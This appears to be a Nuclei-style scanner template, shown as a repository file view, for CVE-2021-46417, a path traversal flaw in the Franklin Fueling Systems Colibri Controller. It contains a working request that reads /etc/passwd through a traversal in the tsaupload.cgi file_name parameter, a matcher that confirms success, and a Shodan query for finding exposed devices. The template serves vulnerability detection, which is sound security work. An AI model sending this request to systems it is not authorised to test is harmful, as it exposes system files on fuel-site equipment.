33 lines
1.2 KiB
YAML
33 lines
1.2 KiB
YAML
id: CVE-2021-46417
|
|
|
|
info:
|
|
name: Franklin Fueling Systems Colibri Controller Module - Local File Inclusion
|
|
author: For3stCo1d
|
|
severity: high
|
|
description: |
|
|
Insecure handling of a download function leads to disclosure of internal files due to path traversal with root privileges in Franklin Fueling Systems Colibri Controller Module 1.8.19.8580.
|
|
reference:
|
|
- https://packetstormsecurity.com/files/166671/Franklin-Fueling-Systems-Colibri-Controller-Module-1.8.19.8580-Local-File-Inclusion.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-46417
|
|
- https://drive.google.com/drive/folders/1Yu4aVDdrgvs-F9jP3R8Cw7qo_TC7VB-R
|
|
- http://packetstormsecurity.com/files/166610/FFS-Colibri-Controller-Module-1.8.19.8580-Directory-Traversal.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2021-46417
|
|
cwe-id: CWE-22
|
|
metadata:
|
|
shodan-query: http.html:"Franklin Fueling Systems"
|
|
tags: cve,cve2021,franklinfueling,lfi
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password="
|
|
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|